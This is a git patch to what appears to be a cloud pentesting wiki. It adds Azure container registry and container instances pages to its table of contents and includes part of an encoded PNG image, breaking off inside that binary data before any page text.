From 0996afea1be78530c250e73001de92d8b398ba7a Mon Sep 17 00:00:00 2001
From: Carlos Polop <carlospolop@gmail.com>
Date: Sun, 12 Jan 2025 19:42:21 +0100
Subject: [PATCH] azure container

---
 src/SUMMARY.md                                |  12 +-
 src/images/registry_roles.png                 | Bin 0 -> 33553 bytes
 .../az-container-instances-privesc.md         |  76 ++++++++
 .../az-container-registry-privesc.md          | 143 +++++++++++++++
 .../az-services/az-container-instances.md     |  47 +++++
 .../az-services/az-container-registry.md      | 166 ++++++++++++++++++
 6 files changed, 440 insertions(+), 4 deletions(-)
 create mode 100644 src/images/registry_roles.png
 create mode 100644 src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.md
 create mode 100644 src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md
 create mode 100644 src/pentesting-cloud/azure-security/az-services/az-container-instances.md
 create mode 100644 src/pentesting-cloud/azure-security/az-services/az-container-registry.md

diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index e3e18e17d..7ab73713c 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -408,6 +408,8 @@
     - [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md)
     - [Az - Automation Accounts](pentesting-cloud/azure-security/az-services/az-automation-accounts.md)
     - [Az - Azure App Services](pentesting-cloud/azure-security/az-services/az-app-services.md)
+    - [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-registry.md)
+    - [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-instances.md)
     - [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB.md)
     - [Az - Intune](pentesting-cloud/azure-security/az-services/intune.md)
     - [Az - File Shares](pentesting-cloud/azure-security/az-services/az-file-shares.md)
@@ -445,7 +447,7 @@
     - [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md)
   - [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md)
     - [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md)
-    - [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB-post-exploitation.md)
+    - [Az - CosmosDB](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md)
     - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md)
     - [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md)
     - [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md)
@@ -460,14 +462,16 @@
     - [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md)
     - [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md)
     - [Az - Automation Accounts Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.md)
-    - [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB-privesc.md)
+    - [Az - Container Registry Privesc](pentesting-cloud/azure-security/az-services/az-container-registry-privesc.md)
+    - [Az - Container Instances Privesc](pentesting-cloud/azure-security/az-services/az-container-instances-privesc.md)
+    - [Az - CosmosDB Privesc](pentesting-cloud/azure-security/az-services/az-cosmosDB-privesc.md)
     - [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md)
       - [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md)
       - [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md)
     - [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md)
     - [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md)
-    - [Az - MySQL](pentesting-cloud/azure-security/az-services/az-mysql-privesc.md)
-    - [Az - PostgreSQL](pentesting-cloud/azure-security/az-services/az-postgresql-privesc.md)
+    - [Az - MySQL Privesc](pentesting-cloud/azure-security/az-services/az-mysql-privesc.md)
+    - [Az - PostgreSQL Privesc](pentesting-cloud/azure-security/az-services/az-postgresql-privesc.md)
     - [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md)
     - [Az - Service Bus Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md)
     - [Az - Static Web App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md)
diff --git a/src/images/registry_roles.png b/src/images/registry_roles.png
new file mode 100644
index 0000000000000000000000000000000000000000..f1d4a361518909201ee9ff872cf1002c4acf238c
GIT binary patch
literal 33553
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
